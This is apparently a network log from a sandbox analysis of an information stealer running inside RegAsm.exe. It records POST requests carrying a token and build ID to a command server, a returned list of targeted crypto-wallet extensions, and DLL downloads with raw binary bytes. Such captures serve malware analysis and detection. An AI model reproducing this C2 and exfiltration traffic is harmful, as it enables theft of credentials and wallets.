2024-03-28 08:16:36 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:16:36 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 62 32 63 64 35 32 61 38 38 63 38 62 31 35 32 31 37 35 34 34 33 34 66 34 63 61 31 63 37 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 Data Ascii: ------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="token"87b2cd52a88c8b1521754434f4ca1c7a------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------EBKEHJJDAAAAKECBGHDACont
2024-03-28 08:16:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:16:37 UTC	5165	IN	Data Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49899	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:37 UTC	311	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 6993 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:16:37 UTC	6993	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 62 32 63 64 35 32 61 38 38 63 38 62 31 35 32 31 37 35 34 34 33 34 66 34 63 61 31 63 37 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 Data Ascii: ------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="token"87b2cd52a88c8b1521754434f4ca1c7a------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------HIEBAKEHDHCAKEBFBKEGCont
2024-03-28 08:16:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:16:38 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49900	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:38 UTC	310	OUT	GET /sqlm.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 If-Modified-Since: Mon, 25 Mar 2024 09:53:07 GMT If-None-Match: "66014983-258600" Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:16:39 UTC	171	IN	HTTP/1.1 304 Not Modified Server: nginx Date: Thu, 28 Mar 2024 08:16:39 GMT Last-Modified: Mon, 25 Mar 2024 09:53:07 GMT Connection: close ETag: "66014983-258600"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49901	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:39 UTC	311	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:16:39 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 62 32 63 64 35 32 61 38 38 63 38 62 31 35 32 31 37 35 34 34 33 34 66 34 63 61 31 63 37 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74 Data Ascii: ------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="token"87b2cd52a88c8b1521754434f4ca1c7a------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------BKJJJDHDGDAAKECAKJDACont
2024-03-28 08:16:40 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:16:40 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49903	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:40 UTC	311	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBFIIIEHCFHJKFHDHDA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 1529 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:16:40 UTC	1529	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 62 32 63 64 35 32 61 38 38 63 38 62 31 35 32 31 37 35 34 34 33 34 66 34 63 61 31 63 37 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 Data Ascii: ------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="token"87b2cd52a88c8b1521754434f4ca1c7a------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------JEBFIIIEHCFHJKFHDHDACont
2024-03-28 08:16:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:16:41 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49905	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:41 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:16:41 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 62 32 63 64 35 32 61 38 38 63 38 62 31 35 32 31 37 35 34 34 33 34 66 34 63 61 31 63 37 61 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="token"87b2cd52a88c8b1521754434f4ca1c7a------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------HJKJKKKJJJKJKFHJJJJECont
2024-03-28 08:16:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:16:42 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49907	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:43 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIEGDAEHIEHIDHJDAAK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:16:43 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 62 32 63 64 35 32 61 38 38 63 38 62 31 35 32 31 37 35 34 34 33 34 66 34 63 61 31 63 37 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------CFIEGDAEHIEHIDHJDAAKContent-Disposition: form-data; name="token"87b2cd52a88c8b1521754434f4ca1c7a------CFIEGDAEHIEHIDHJDAAKContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------CFIEGDAEHIEHIDHJDAAKCont
2024-03-28 08:16:43 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:16:43 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49908	78.46.229.36	443	7076	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:44 UTC	205	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
2024-03-28 08:16:44 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:44 GMT Content-Type: application/octet-stream Content-Length: 685392 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-a7550" Accept-Ranges: bytes
2024-03-28 08:16:44 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-03-28 08:16:44 UTC	16384	IN	Data Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b Data Ascii: }1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x]E0
2024-03-28 08:16:44 UTC	16384	IN	Data Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90 Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
2024-03-28 08:16:44 UTC	16384	IN	Data Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
2024-03-28 08:16:45 UTC	16384	IN	Data Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
2024-03-28 08:16:45 UTC	16384	IN	Data Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0 Data Ascii: }EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w w1
2024-03-28 08:16:45 UTC	16384	IN	Data Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE\|l
2024-03-28 08:16:45 UTC	16384	IN	Data Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
